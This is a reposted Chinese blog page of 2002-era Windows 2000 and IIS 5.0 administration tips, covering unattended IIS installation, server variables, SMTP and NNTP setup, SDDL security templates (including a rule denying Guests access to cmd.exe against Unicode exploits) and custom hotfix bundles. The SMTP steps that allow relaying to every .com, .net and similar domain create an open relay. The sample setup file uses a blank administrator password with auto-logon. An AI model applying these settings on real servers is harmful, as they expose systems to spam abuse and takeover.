After trying workarounds such as upgrading the NIC software, I hadn't found a solution. Finally, I came across the Microsoft article "Increase Domain Logon Timeout over Network" (http://support.microsoft.com/support/kb/articles/q163/2/04.asp), which provided a solution: Use a registry editor to add the ExpectedDialupDelay parameter of type REG_DWORD to the HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Services\Netlogon\Parameters subkey. This value has a range of 0 to 600 seconds. To find the right timeout value, I experimented a bit and came up with a value for my network of from 4 to 8 seconds. My theory is that this logon delay is necessary to let the switches build entries in their routing tables as soon as the client starts.
安裝IIS 5.0 DIY
Author: Adam
Date: 2002-1-13 18:35:02
在安裝Windows2000的時候,若是你選擇了安裝IIS,那麼在安裝的時候系統將會你的%SystemDrive%裏建立一個InetPub目錄,並且還會在Inetpub目錄下建立一個Scripts目錄,IIS還會建立一個虛擬目錄SCIPTS指向該目錄,而且給這個目錄執行權限。前段時間NSFocus安全小組研究發現的「Unicode解碼目錄遍歷漏洞」大部分問題就是針對Web站點的可執行目錄而言的,因此咱們建議把該目錄移到非系統盤在必定程度上能夠保證必定的安全。
然而在咱們選擇安裝系統組件的時候,沒法本身定義IIS的安裝盤符,因此纔有了今天的這篇文章。:)
咱們在安裝系統的時候不選擇安裝IIS,等系統安裝完成後手動來作,咱們可使用無人值守的方式自定義安裝IIS 5.0。首先確認你的 Windows 2000的安裝介質是可用的,本例中的安裝介質是光盤,所以只要將安裝光盤插入光驅便可,而後在你的硬盤或者軟盤上建立一個無人值守安裝文件,本例中咱們將在D盤建立一個 IIS5install.txt 做爲無人值守安裝文件,下面咱們看看該文件的內容:
[Components] 所安裝的組件
iis_common = on 公用文件
iis_inetmgr = on IIS管理器
iis_www = on WWW服務
iis_ftp = on FTP服務
iis_htmla = on Web方式的IIS管理器
[InternetServer]
Path="D:\inetsrv" Common文件放置位置(若是你是卸載了IIS再手動裝,公用文件仍是會位置保持不變)
PathFTPRoot="D:\inetPub\FTPRoot" FTP的根路徑
PathWWWRoot="D:\InetPub\wwwroot" WWW的根路徑
將該文件存盤後,運行「sysocmgr /i:%windir%\inf\sysoc.inf /u:d:\iis5install.txt」,
不會有提示框出現,系統將自動的爲你安裝好IIS,並且Scripts目錄將會在D盤,使用「Unicode解碼目錄遍歷漏洞」也就失效了。
若是你須要安裝更多的IIS組件,如下是一個比較詳細的無人值守安裝文件:
=========================================BEGIN============================
;This is an example Unattended installation file
;IIS, MTS, and Index Server are ON
;Target Path should be new directory
;Adminpassword is blank.
[Unattended]
Unattendmode = FullUnattended
OemPreinstall = NO
TargetPath = *
Filesystem = LeaveAlone
[UserData]
FullName = "Your User Name"
OrgName = "Your Organization Name"
ComputerName = "ComputerName"
[GuiUnattended]
TimeZone = "004"
AdminPassword = *
AutoLogon = Yes
[LicenseFilePrintData]
AutoMode = "PerServer"
AutoUsers = "0"
[Display]
BitsPerPel = 4
XResolution = 800
YResolution = 600
VRefresh = 70
[Networking]
InstallDefaultComponents = YES
[Identification]
JoinWorkgroup = Workgroup
;Turns NT Components (and their respective sections) ON or OFF
[Components]
iis_common = on
iis_inetmgr = on
iis_www = on
iis_ftp = on
iis_htmla = on
iis_doc = on
iis_pwmgr = on
iis_smtp = on
iis_smtp_docs = on
mts_core = on
msmq = off
terminalservices = off
reminst = off
certsrv = off
rstorage = off
indexsrv_system = on
certsrv_client = off
certsrv_server = off
certsrv_doc = off
[InternetServer]
;Without these keys specified IIS will use the default settings
; Note that the Path is location for INETSRV, the core IIS programs and files.
Path=D:\Securelocation
PathFTPRoot=E:\Inetpub\Ftproot PathWWWRoot=E:\Inetpub\Wwwroot
IE5 所支持的全部server端變量
Author: MSDN
Date: 2002-1-13 18:35:01
如下是MSDN (1999年4月版)提供的 IE5 所支持的全部server端變量
部分變量在之前的版本中不支持,並且在之後的版本中可能會有變化
Variable Description
ALL_HTTP All HTTP headers sent by the client.
ALL_RAW Retrieves all headers in the raw-form. The
difference between ALL_RAW and ALL_HTTP is
that ALL_HTTP places an HTTP_ prefix before
the header name and the header-name is always
capitalized. In ALL_RAW the header name and
values appear as they are sent by the client.
APPL_MD_PATH Retrieves the metabase path for the (WAM)
Application for the ISAPI DLL.
APPL_PHYSICAL_PATH Retrieves the physical path corresponding to
the metabase path. IIS converts the APPL_MD_PATH
to the physical (directory) path to return
this value.
AUTH_PASSWORD The value entered in the client's authentication
dialog. This variable is only available if Basic
authentication is used.
AUTH_TYPE The authentication method that the server uses to
validate users when they attempt to access a
protected script.
AUTH_USER Raw authenticated user name.
CERT_COOKIE Unique ID for client certificate, Returned as a
string. Can be used as a signature for the whole
client certificate.
CERT_FLAGS bit0 is set to 1 if the client certificate is
present.
bit1 is set to 1 if the Certificate Authority of
the client certificate is invalid (not in the
list of recognized CA on the server).
CERT_ISSUER Issuer field of the client certificate (O=MS,
OU=IAS, CN=user name, C=USA).
CERT_KEYSIZE Number of bits in Secure Sockets Layer connection
key size. For example, 128.
CERT_SECRETKEYSIZE Number of bits in server certificate private key.
For example, e.g. 1024.
CERT_SERIALNUMBER Serial number field of the client certificate.
CERT_SERVER_ISSUER Issuer field of the server certificate.
CERT_SERVER_SUBJECT Subject field of the server certificate.
CERT_SUBJECT Subject field of the client certificate.
CONTENT_LENGTH The length of the content as given by the client.
CONTENT_TYPE The data type of the content. Used with queries
that have attached information, such as the HTTP
queries GET, POST, and PUT.
GATEWAY_INTERFACE The revision of the CGI specification used by the
server. The format is CGI/revision.
HTTP_<HeaderName> The value stored in the header HeaderName. Any
header other than those listed in this table must
be prefixed by HTTP_ in order for the
ServerVariables collection to retrieve its value.
Note The server interprets any underscore (_)
characters in HeaderName as dashes in the
actual header. For example if you specify
HTTP_MY_HEADER, the server searches for a
header sent as MY-HEADER.
HTTP_ACCEPT Returns the value of the Accept header.
HTTP_ACCEPT_LANGUAGE Returns a string describing the language to use
for displaying content.
HTTP_USER_AGENT Returns a string describing the browser that sent
the request.
HTTP_COOKIE Returns the cookie string that was included with
the request.
HTTP_REFERER Returns a string containing the URL of the
original request when a redirect has occurred.
HTTPS Returns ON if the request came in through secure
channel (SSL) or it returns OFF if the request is
for a non-secure channel.
HTTPS_KEYSIZE Number of bits in Secure Sockets Layer connection
key size. For example, 128.
HTTPS_SECRETKEYSIZE Number of bits in server certificate private key.
For example, 1024.
HTTPS_SERVER_ISSUER Issuer field of the server certificate.
HTTPS_SERVER_SUBJECT Subject field of the server certificate.
INSTANCE_ID The ID for the IIS instance in textual format. If
the instance ID is 1, it appears as a string. You
can use this variable to retrieve the ID of the
Web-server instance (in the metabase) to which the
request belongs.
INSTANCE_META_PATH The metabase path for the instance of IIS that
responds to the request.
LOCAL_ADDR Returns the Server Address on which the request
came in. This is important on multihomed machines
where there can be multiple IP addresses bound to
a machine and you want to find out which address
the request used.
LOGON_USER The Windows NT® account that the user is logged
into.
PATH_INFO Extra path information as given by the client. You
can access scripts by using their virtual path and
the PATH_INFO server variable. If this information
comes from a URL, it is decoded by the server before
it is passed to the CGI script.
PATH_TRANSLATED A translated version of PATH_INFO that takes the
path and performs any necessary virtual-to-physical
mapping.
QUERY_STRING Query information stored in the string following the
question mark (?) in the HTTP request.
REMOTE_ADDR The IP address of the remote host making the request.
REMOTE_HOST The name of the host making the request. If the
server does not have this information, it will set
REMOTE_ADDR and leave this empty.
REMOTE_USER Unmapped user-name string sent in by the User. This
is the name that is really sent by the user as opposed
to the ones that are modified by any authentication
filter installed on the server.
REQUEST_METHOD The method used to make the request. For HTTP, this
is GET, HEAD, POST, and so on.
SCRIPT_NAME A virtual path to the script being executed. This is
used for self-referencing URLs.
SERVER_NAME The server's host name, DNS alias, or IP address as
it would appear in self-referencing URLs.
SERVER_PORT The port number to which the request was sent.
SERVER_PORT_SECURE A string that contains either 0 or 1. If the request
is being handled on the secure port, then this will be
1. Otherwise, it will be 0.
SERVER_PROTOCOL The name and revision of the request information
protocol. The format is protocol/revision.
SERVER_SOFTWARE The name and version of the server software that
answers the request and runs the gateway. The format
is name/version.
URL Gives the base portion of the URL.
如何把IIS 5.0自帶的SMTP Service做爲你公司的SMTP服務器
Author: joyadam@myrealbox.com
Date: 2002-1-13 18:35:01
今天恰好看到有網友問到了這樣的問題,就作了一個小小的實驗,其實設置起來很簡單的。
進入IIS管理器->默認SMTP虛擬服務器->域
一、右擊「域」->新建 域->選擇遠程,下一步->名稱中填寫 *.com->完成
二、右擊 *.com -> 屬性 ->常規->選擇容許將待收郵件中繼到此域->肯定
重複Step 1和Step 2,把com改爲net,改爲org,改爲cn,改爲tw……
你就能夠把你想要發送的郵件發送到你想要的域裏去了,固然,這是一個很笨的方法
不過很管用!
Try it now!
IIS 5.0自帶NNTP Server權限控制全攻略
Author: joyadam@myrealbox.com
Date: 2002-1-13 18:35:00
在IIS 5.0中自帶了一個NNTP Server,設置簡單,也可以知足你們的須要,咱們公司也是使用的這個破破的玩藝,但因爲沒法設置太多的訪問控制,不少不肯意公開的討論組也沒法藏而不露,不過要知道,由於有了2000,由於有了NTFS,一切都變得太簡單了……
測試環境:
Windows 2000 Server,運行NNTP Service
建立一個討論組 adam.test
建好討論組後,在\Inetpub\nntpfile\root下就會生成 adam\test 目錄,而咱們只要設置好這兩個目錄的 NTFS 權限後就能夠很好的控制每個討論組了,不過首先你須要做如下的操做:
Internet 服務管理器 -> 默認NNTP虛擬服務器 -> 屬性 -> 訪問 -> 取消"容許匿名"
而後建立一個組 adam ,把相應的用戶放進這個組裏面
設置 adam\test 目錄的權限爲 System(F)和adam(F),這樣其餘用戶就沒法訪問該討論組了,而 adam 組能夠照常發貼子看貼子。
不過在你的客戶端必須設置才能夠哦,嘿嘿
以Outlook Express爲例:
建立一個新聞組賬號,查看其屬性->服務器->此服務器須要登錄->輸入用戶名和口令
All is OK……
尾註:
雖然這個玩藝設置簡單,可是管理倒是大大的不方便,因此我在這裏強烈推薦一個新聞組服務器軟件,Dnews,如今版本好像是5.4f3,帶 Web 界面,有管理端口,還能夠直接 Telnet 管理,實在是Cool得不得了……至於下載的地方嘛,http://netwinsite.com/ :)
怎樣編寫安全模板(權限設置DIY之SDDL簡介)
Author: joyadam@myrealbox.com
Date: 2002-4-10 0:16:52
Windows 2000 提供了使用「安全模板」管理單元方式定義安全性的集中式方法。對於一個網絡管理員而言,安裝系統並進行安全配置再也不是一項繁瑣的工做了,如今須要作的事情只有維護一個安全模板文件便可,而後在系統從新安裝後和安全模板更新後應用該模板便可。
一個安全模板文件分爲不少字段,系統也自帶了許多模板文件在%systemroot%\security\templates目錄,你們能夠看看 inf 文件的格式,inf 文件功能強大,通常來講,能夠對系統的如下安全策略進行設置:
◆賬戶策略:密碼、賬戶鎖定和 Kerberos 策略的安全性
◆本地策略:用戶權利和記錄安全事件。
◆受限的組:本地組成員的管理
◆註冊表:本地註冊表項的安全性
◆文件系統:本地文件系統的安全性
◆系統服務:本地服務的安全性和啓動模式
咱們今天討論的主要是如何對系統的一些對象進行權限設置的方法,包括註冊表的權限、文件和目錄的權限、服務的權限...(其餘的東西經過圖形模式搞定)這裏就要涉及到了SDDL(Security Descriptor Definition Language),那麼SDDL到底是啥樣子的呢?咱們看一看下面的Sample,
例:
"%systemroot%\system32\cmd.exe",0,"D:AR(D;OICI;FA;;;BG)"
這一行應該出如今inf文件裏的File Security裏,它的做用是禁止Guests組用戶對cmd.exe文件進行訪問,一些常見的漏洞(如Unicode)使用IUSR_Machinename或IWAM_Machinename用戶經過異常的方式對該文件進行訪問,執行非法的程序,而這2個用戶都是屬於Guests組的,因此你們應該知道這個例子的意義了吧,接着來分析這一行,這一行被2個逗號分紅3部分,下面對這3段進行講解:
第一段:
文件名或者目錄名(顯而易見)
第二段:
這裏能夠選擇的值有3個
0,配置該文件或目錄,而後向它的子目錄和該目錄下文件將設置的權限進行傳遞;
1,不替代該文件已有的權限,至關於cacls /e(若是不知道cacls爲什麼物,能夠執行cacls /?看看,或者繼續偶的字數不夠幫助湊)
2,配置該文件或目錄,而後替換全部帶繼承權限的子目錄和文件的權限
第三段:
這就是全文的重點--SDDL
首先咱們看看這 D:AR(D;OICI;FA;;;BG) 中的第一個字段,這裏填充的是D,
咱們能夠選擇的有:
(O:) owner, (G:)primary group, (D:)DACL , (S:)SACL .也就是說咱們能夠經過inf文件設置對象的Owner,Primary Group,DACL和SACL,通常最多見的也就是上面提到的D,設置文件的訪問控制列表。
再看看第二個字段,上面填寫的是AR,這個字段只有當你設置ACL時纔會出現
設置DACL時,咱們能夠選擇的有:
"P"--SE_DACL_PROTECTED flag, Protects the DACL of the security descriptor from being modified by inheritable ACEs.
"AR"--SE_DACL_AUTO_INHERIT_REQ flag, Requests that the provider for the object protected by the security descriptor automatically propagate the DACL to existing child objects. If the provider supports automatic inheritance, it propagates the DACL to any existing child objects, and sets the SE_DACL_AUTO_INHERITED bit in the security descriptors of the object and its child objects.
"AI"--SE_DACL_AUTO_INHERITED flag, Indicates a security descriptor in which the DACL is set up to support automatic propagation of inheritable ACEs to existing child objects. This bit is set only if the automatic inheritance algorithm has been performed for the object and its existing child objects.
This bit is not set in security descriptors for Windows NT versions 4.0 and earlier, which did not support automatic propagation of inheritable ACEs.
設置SACL時,咱們能夠選擇的有:
"P"--SE_SACL_PROTECTED flag, Protects the SACL of the security descriptor from being modified by inheritable ACEs.
"AR"--SE_DACL_AUTO_INHERIT_REQ flag, Requests that the provider for the object protected by the security descriptor automatically propagate the SACL to existing child objects. If the provider supports automatic inheritance, it propagates the SACL to any existing child objects, and sets the SE_SACL_AUTO_INHERITED bit in the security descriptors of the object and its child objects.
"AI"--SE_DACL_AUTO_INHERITED flag, Indicates a security descriptor in which the SACL is set up to support automatic propagation of inheritable ACEs to existing child objects. This bit is set only if the automatic inheritance algorithm has been performed for the object and its existing child objects.
This bit is not set in security descriptors for Microsoft Windows NT versions 4.0 and earlier, which did not support automatic propagation of inheritable ACEs.
注:原諒我不翻譯上面的文字,由於這些東西真的沒法用中文表示,不少東西沒有一個權威的翻譯,我也不想被人家笑話。
OK,咱們最後看看最複雜的第三段 D;OICI;FA;;;BG ,被5個分號分紅6個小節
第一節:ACE類型,咱們這裏使用的是 D,能夠選擇的有
"A" ACCESS_ALLOWED
"D" ACCESS_DENIED
"OA" OBJECT ACCESS ALLOWED
"OD" OBJECT ACCESS DENIED
"AU" AUDIT
"AL" ALARM
"OU" OBJECT AUDIT
"OL" OBJECT ALARM
第二節:ACE標誌,咱們這裏的值是OICI,能夠選擇的有
"CI" CONTAINER INHERIT
"OI" OBJECT INHERIT
"NP" NO PROPAGATE
"IO" INHERIT ONLY
"ID" INHERITED
"SA" AUDIT SUCCESS
"FA" AUDIT FAILURE
第三節:權限類型,咱們這裏的值是FA,能夠選擇的有
對於目錄而言:
"RP" READ
"WP" WRITE
"CC" CREATE CHILD
"DC" DELETE CHILD
"LC" LIST CHILDREN
"SW" SELF WRITE
"LO" LIST OBJECT
"DT" DELETE TREE
"CR" CONTROL ACCESS
對於文件而言:
"FA" ALL
"FR" READ
"FW" WRITE
"FX" EXECUTE
對於註冊表權限而言:
"KA" ALL
"KR" READ
"KW" WRITE
"KX" EXECUTE
注:註冊表和文件、目錄同樣,也能夠inf文件裏設置權限,格式和文件一致,只是把文件名換成鍵名便可,如machine\software\NSFOCUS\Adam
第四節和第五節都爲空,它們分別表示的是Object GUID和inherit object guid,我見過的大多數inf文件這2個字段都爲空,咱們作inf文件的時候也空就行了 :)
第六節:這裏表示的是用戶或組,通常而言咱們設置的時候都是系統自帶的用戶或組,若是你非要爲本身建的用戶設置這些玩藝,那你就用用戶或組的SID表示好了,而系統自帶的用戶或組,咱們的表示方法以下:
"AO" Account operators
"RU" Alias to allow previous Windows 2000
"AN" Anonymous logon
"AU" Authenticated users
"BA" Built-in administrators
"BG" Built-in guests
"BO" Backup operators
"BU" Built-in users
"CA" Certificate server administrators
"CG" Creator group
"CO" Creator owner
"DA" Domain administrators
"DC" Domain computers
"DD" Domain controllers
"DG" Domain guests
"DU" Domain users
"EA" Enterprise administrators
"ED" Enterprise domain controllers
"WD" Everyone
"PA" Group Policy administrators
"IU" Interactively logged-on user
"LA" Local administrator
"LG" Local guest
"LS" Local service account
"SY" Local system
"NU" Network logon user
"NO" Network configuration operators
"NS" Network service account
"PO" Printer operators
"PS" Personal self
"PU" Power users
"RS" RAS servers group
"RD" Terminal server users
"RE" Replicator
"RC" Restricted code
"SA" Schema administrators
"SO" Server operators
"SU" Service logon user
在這個列表裏面咱們能夠很輕鬆地找到咱們所用的BG用戶表明的Guests組
若是咱們爲某個文件或文件夾對象設置多個ACE,
本地Administrators:Full Control
本地Guests:Read
那咱們能夠寫"D:AR(A;OICI;FA;;;LA)(A;OICI;FR;;;BG)"
OK,SDDL的大體介紹就寫這麼多吧,這些東西光看用處是不大的,還須要本身多加測試,歡迎各位看官不吝指正...
參考文獻:
MSDN Libary
如何製做本身的Service Pack
Author: joyadam@myrealbox.com
Date: 2002-1-13 18:34:46
做爲一個Windows 系統的管理員,安裝安全HotFix應該是不會陌生的,每次咱們在裝完一臺機器後老是下載無數補丁,但煩人的是往往安裝一個HotFix系統都會Reboot一次,固然,在Reboot前咱們不點擊"肯定"按鈕,直接安裝完其餘的補丁後一次Reboot也何嘗不可,可是這樣彷佛顯得有點不大專業,今天我教你們做一個本身的Service Pack,能夠把你須要安裝的補丁在一次安裝完畢,好像很Cool哦~
爲了測試,我選擇了一臺中文版Windows 2000 Server,而咱們須要安裝的安全補丁爲2個(固然不止這些,打個比方而已),一個是Windows 2000的輸入法漏洞的補丁(Q270676),一個是命名管道的補丁(Q269523)。
Now, Let's go~
二、咱們切換到CMD模式,在C盤建立一個hotfix的目錄,而後執行
Q269523_W2K_SP2_x86_CN.EXE /x(建議解包的順序按Q號的大小排列,由小到大,理由我會在後面提到)
看到要求輸入解包路徑的提示後輸入"C:\Hotfix"。
C:\>cd hotfix
C:\hotfix>dir
驅動器 C 中的卷是 C
卷的序列號是 AC58-F7F5
C:\hotfix 的目錄
2001-05-04 04:00 <DIR> .
2001-05-04 04:00 <DIR> ..
2000-08-14 18:57 98,064 hotfix.exe
2000-08-14 18:57 15,139 hotfix.inf
2000-08-14 17:19 835,856 kernel32.dll
2000-08-14 17:19 85,776 services.exe
2000-08-14 18:31 88,245 sp2.cat
2000-08-14 18:57 3,584 spmsg.dll
2001-05-04 04:00 <DIR> symbols
2001-05-04 04:00 <DIR> uniproc
而後咱們將hotfix.inf文件複製一份。
C:\hotfix>copy hotfix.inf q269523_cn.inf
已複製 1 個文件。
緊接着咱們將第二個HotFix解包,
Q270676_W2K_SP2_x86_CN.EXE /x
看到要求輸入解包路徑的提示後輸入"C:\Hotfix"。
也將此時的hotfix.inf文件複製一份。
C:\hotfix>copy hotfix.inf q270676_cn.inf
已複製 1 個文件。
第三個、第四個........重複一樣的操做。
三、此時咱們已經將HotFix的文件都解包至C:\Hotfix目錄,而且有了各個HotFix的inf文件的拷貝,咱們如今來分析這些inf文件,通常咱們把最後解包的inf文件做爲模板,由於inf文件分不少字段,從我觀察的結果來看,隨着時間的推移,inf文件的字段可能會增長,這也就是咱們開始解包按Q大小順序的緣由,本例中咱們以Q270676的inf文件爲模板,咱們編輯hotfix.inf文件,這個文件已經包含了Q270676的信息,咱們只要把Q269523中的信息添加到該文件中便可,下面咱們來分析Q269523的inf文件的內容:
前面的大部分基本都是類似的,咱們只搜尋一些不同凡響的字段。
[MustReplace.System32.files]
SERVICES.EXE
[CopyAlways.DriverCab.files]
kernel32.dll
[Cache.files]
SERVICES.EXE
KERNEL32.DLL
[Uniprocessor.Kernel.files]
KERNEL32.DLL,UNIPROC\KERNEL32.DLL
[Multiprocessor.Kernel.files]
KERNEL32.DLL
[SourceDisksFiles]
SERVICES.EXE=1
UNIPROC\KERNEL32.DLL
KERNEL32.DLL=1
而後咱們在hotfix.inf文件中搜尋MustReplace.System32.files,而後加入一行
SERVICES.EXE
爲了之後方便,咱們通常加上一些註釋,編輯後的hotfix.inf文件的MustReplace.System32.files字段就成了下面這個樣子:
[MustReplace.System32.files]
;Q269523 Added by Adam
SERVICES.EXE
接着搜尋CopyAlways.DriverCab.files、Cache.files、Uniprocessor.Kernel.files、Multiprocessor.Kernel.files、SourceDisksFiles,並將相應的信息添加到hotfix.inf文件中,也要注意添加必要的註釋文件,inf文件中表示註釋的符號爲分號。固然,咱們也建議您把自己的模板文件中必要的項也做一下注釋,如2個hotfix都包含的Cache.files,咱們修改後就成了:
[Cache.files]
;Q269523 Added by Adam
SERVICES.EXE
KERNEL32.DLL
;Q270676 Added by Adam
winzm.ime
winsp.ime
winpy.ime
wingb.ime
winabc.ime
實際上,到這一步,咱們就已經能夠用咱們做好的東東了,可是爲了之後的方便,咱們必須修改一些顯示信息,這就是inf文件中的Strings字段。咱們到inf文件的最末尾能夠看到Strings字段,咱們必須在這裏修改一些必要的信息。
首先修改Q號(不是OICQ號碼哦),將Q號改爲你喜歡的6位數,固然,輸入其餘字符也能夠,可是也許會和某些查HotFix的軟件有衝突,仍是用6位數字好了,而後修改Comments,咱們把Q269523的Comment粘貼過來,也能夠加上一些本身的描述,修改後的Strings字段就成了下面的樣子:
[Strings]
LangTypeValue=4
ServicePackSourceFiles="Windows 2000 Hotfix 源文件"
HOTFIX_NUMBER="Q123456"
SERVICE_PACK_NUMBER=1
COMMENT="Windows 2000 Hotfix (Pre-SP2) [See Q270676 for more information] This Fix Corrects the IME Problem...Windows 2000 Hotfix (Pre-SP2) [See Q269523 for more information] This Fix Corrects the NamePipe Problem..."
這樣也方便咱們往後對已安裝的補丁進行查看。
四、好了,該修改的地方咱們已經弄完了,咱們開始安裝咱們本身做的Service Pack吧,其實咱們只要執行HotFix.exe便可,它會本身去找inf文件,而後你會看到一個拷貝文件的進度條,接着是系統要求你Reboot,點"肯定",重啓,咱們的HotFix就安裝完畢了。
五、最後咱們能夠看看效果,你能夠去看看註冊表:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\HotFix
你會發現你安裝的Q123456乖乖地呆在那裏了~頗有成就感哦~
最後總結一下:往往出一個新的HotFix後,你就將文件添加到你的SP包中,而後修改你的inf文件,你就能夠不去理會微軟是否是還爲你發佈新的SP了(NT 4的SP 7沒有了),固然,SP中不光包含安全補丁,對系統的其餘方面也有所改善,土八路畢竟仍是比不上正規軍的。
分類: 安裝部署
綠色通道: 好文要頂 關注我 收藏該文與我聯繫
freeliver54
關注 - 1
粉絲 - 149 +加關注 0 0 (請您對文章作出評價) ? 博主上一篇:[轉]Writing Installs With The Windows Installer Is A Pain!
? 博主下一篇:微軟的軟件受權及保護服務(SLPS)
posted on 2008-05-27 16:56 freeliver54 閱讀(3281) 評論(1) 編輯 收藏
評論
#1樓12109692008/5/27 20:46:10 2008-05-27 20:46 烏生魚湯
滔滔江水
支持(0)反對(0)
刷新評論刷新頁面返回頂部
註冊用戶登陸後才能發表評論,請 登陸 或 註冊,訪問網站首頁。
博客園首頁博問新聞閃存程序員招聘知識庫
最新IT新聞:
· 移動應用被蘋果拒之門外的9個意外緣由
· Twitter爲其Promoted Trend廣告提價,如今20萬美圓一天
· 陰柔第三者:神話與民俗中的蛇
· LinkedIn韋納新年5大心願:拓展全球市場居首
· 儘管被質疑 咱們仍是該感謝12306!
? 更多新聞...
最新知識庫文章:
· 對象的消息模型
· 16條技巧讓你更高效使用SSH
· HTML5之美
· 天天工做的第一個小時,作什麼?
· Hadoop 分佈式文件系統:架構和設計
? 更多知識庫文章...
Powered by:
博客園
Copyright ? freeliver54
導航
博客園
首頁
新隨筆
聯繫
訂閱
管理
統計
隨筆 - 1272
文章 - 3
評論 - 1710
引用 - 157
公告
生有涯 力有限
要事第一 事不過三
揚長用強 捨得取捨
確立生活價值
分段人生歷程
目標 計劃 去行動...
每一天都有新的開始
每一天都是新的開始
願咱們
有始有終 鍥而不捨
無論前方 是但願仍是迷茫
咱們都只有一個信念
讓咱們的愛 伴咱們終生
健康 平安 簡單 惜福
暱稱:freeliver54
園齡:7年
粉絲:149
關注:1
+加關注
搜索
隨筆分類
Ajax.Net(12)
Android-app(183)
Android-SourceCode(3)
Android-web(3)
Ant/NAnt(9)
apple(1)
asp.net mvc(2)
C++/VC++(18)
Cloud Computing(4)
Eclipse RCP(9)
English(15)
Flash / Flex & PhotoShop(21)
HTML5/CSS(27)
HTTP網絡通訊(13)
Java(49)
Java Web(11)
JavaScript/Jquery(73)
LAMP/WAMP(6)
LINQ(3)
Linux(6)
MS SQL(59)
MySQL(46)
Oracle(6)
PHP(5)
Python(1)
SQLite(8)
UML(4)
Visual Basic/ASP(9)
VS2008(13)
VS2010(12)
VS技術實踐(394)
wap wml(3)
WCF(7)
Web(5)
WebGL(2)
windows mobile(13)
Windows Server(24)
WinForm 開發(72)
WPF(1)
XML(11)
安全與加密(23)
安裝部署(48)
報表/曲線(21)
測試(25)
大工 工商管理(4)
二維碼/條形碼(11)
技有所用(6)
開源軟件(14)
勵志(32)
每日文摘(139)
其餘(12)
企業管理|職業經理人(7)
軟件架構 設計模式(7)
軟件項目工程(43)
軟件項目管理(26)
軟考&英語考試(16)
生活|理財(19)
手機維修(1)
數據結構與算法(3)
圖書目錄(52)
網址(62)
心靈之旅(113)
硬件網絡(21)
遊戲開發(17)
隨筆檔案
2013年1月 (15)
2012年12月 (19)
2012年11月 (19)
2012年10月 (16)
2012年9月 (24)
2012年8月 (21)
2012年7月 (15)
2012年6月 (44)
2012年5月 (19)
2012年4月 (2)
2012年3月 (17)
2012年2月 (20)
2012年1月 (15)
2011年12月 (25)
2011年11月 (15)
2011年10月 (16)
2011年9月 (39)
2011年8月 (36)
2011年7月 (14)
2011年6月 (11)
2011年5月 (32)
2011年4月 (12)
2011年3月 (12)
2011年2月 (16)
2011年1月 (10)
2010年12月 (11)
2010年11月 (7)
2010年10月 (18)
2010年9月 (11)
2010年8月 (1)
2010年7月 (6)
2010年6月 (4)
2010年5月 (1)
2010年4月 (3)
2010年3月 (6)
2010年2月 (3)
2010年1月 (5)
2009年12月 (10)
2009年11月 (4)
2009年10月 (8)
2009年9月 (5)
2009年8月 (9)
2009年7月 (8)
2009年6月 (4)
2009年5月 (6)
2009年4月 (4)
2009年3月 (12)
2009年2月 (24)
2009年1月 (10)
2008年12月 (14)
2008年11月 (18)
2008年10月 (23)
2008年9月 (22)
2008年8月 (9)
2008年7月 (30)
2008年6月 (17)
2008年5月 (11)
2008年4月 (45)
2008年3月 (28)
2008年2月 (11)
2008年1月 (17)
2007年12月 (15)
2007年11月 (20)
2007年10月 (22)
2007年9月 (36)
2007年8月 (23)
2007年7月 (24)
2007年6月 (6)
2007年5月 (7)
2007年4月 (32)
2007年3月 (46)
2007年2月 (22)
2007年1月 (31)
2006年12月 (45)
2006年11月 (8)
2006年7月 (1)
2006年6月 (3)
2006年5月 (1)
2006年4月 (13)
2006年2月 (8)
techLINKS
Ajax.net
ASP.NET 快速入門教程
MSDN
UML
winforms
XSLT
窗體 快速入門教程
移動開發人員中心
友情連接
積分與排名
積分 - 941044
排名 - 43
最新評論
1. Re:WPF 視頻教程
http://archive.msdn.microsoft.com/wpfsamples
--freeliver54
2. Re:設計模式 相關學習網址
分享一下我記憶23種設計模式的方法 http://www.cnblogs.com/liningx/archive/2008/02/19/1073117.html來CNBLOGS很久了,也沒寫過點什麼,最近在學習23種設計模式,既然是要學習這些模式,首先得記住吧,呵呵,下面我總結我一下個人記憶方法,但願給你們分享。 首先列出23種設計模式 1 Singleton 單件 2 A...
--freeliver54
3. Re:[轉]Ubuntu下基於Eclipse的Android開發環境的方法
Android自學筆記(番外篇):全面搭建Linux環境(三)——Ubuntu10.04(LTS)的安裝與配置 http://chirs1012f.iteye.com/blog/968118
--freeliver54
4. Re:[轉]虛擬機下Ubuntu共享主機文件(Ubuntu、VMware、共享)
http://hi.baidu.com/chenyangxin/item/af0f67e35dc67af12b09a443
Ubuntu10.10下Samba服務器的搭建
--freeliver54
5. Re:[轉]虛擬機下Ubuntu共享主機文件(Ubuntu、VMware、共享)
Ubuntu下配置samba實現文件夾共享 http://www.cnblogs.com/phinecos/archive/2009/06/06/1497717.html一. samba的安裝:sudo apt-get insall sambasudo apt-get install smbfs二. 建立共享目錄:mkdir /home/phinecos/sharesodu chmod 777 /... --freeliver54 閱讀排行榜 1. 遭遇「windows已經阻止此軟件由於沒法驗證發行者」(40046) 2. SQL 2005 Express 的「企業管理器」 下載(27704) 3. 程序員的人生 該將如何規劃?(27405) 4. VS2005中GridView簡單應用(24529) 5. [轉]C#中的IntPtr類型(24401) 6. [轉]mysql的top n查詢(18710) 7. 下載Eclipse的SWT插件(15410) 8. [轉]Android讀寫文件(14653) 9. C# WinForm 父窗體 子窗體 傳值(12656) 10. c# winForm TableLayoutPanel學習 合併行的佈局及動態增長刪除內部控件(12328) 評論排行榜 1. 程序員的人生 該將如何規劃?(169) 2. VS2005中GridView簡單應用(28) 3. C# 利用WinRAR (加密)壓縮及解壓縮 相關文件夾及文件(22) 4. sql server做業用法(15) 5. [引]VS2005幫助文檔 : 加密 概述(15) 推薦排行榜 1. C# WinForm 父窗體 子窗體 傳值(7) 2. 軟件開發管理之:編碼負責人及標準代碼庫機制(5) 3. [轉]Android藍牙開發淺談(4) 4. c# winform 打印 窗體 及 窗體控件內容 的 初級嘗試(3) 5. [轉]C# Socket編程筆記(3) 6. [轉]C#中ToString格式大全(2) 7. [轉]C#中的IntPtr類型(2) 8. [引]C# WinForm DirectShow視頻採集及圖片抓取實例DxSnap(2) 9. [轉]用C# 實現C/S模式下軟件自動在線升級(2) 10. 入門者初試 Cell(華表)結合C#的應用(2)
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. bat語法集
- 2. bat語法
- 3. Windows bat 腳本簡單用法
- 4. bat 命令語法
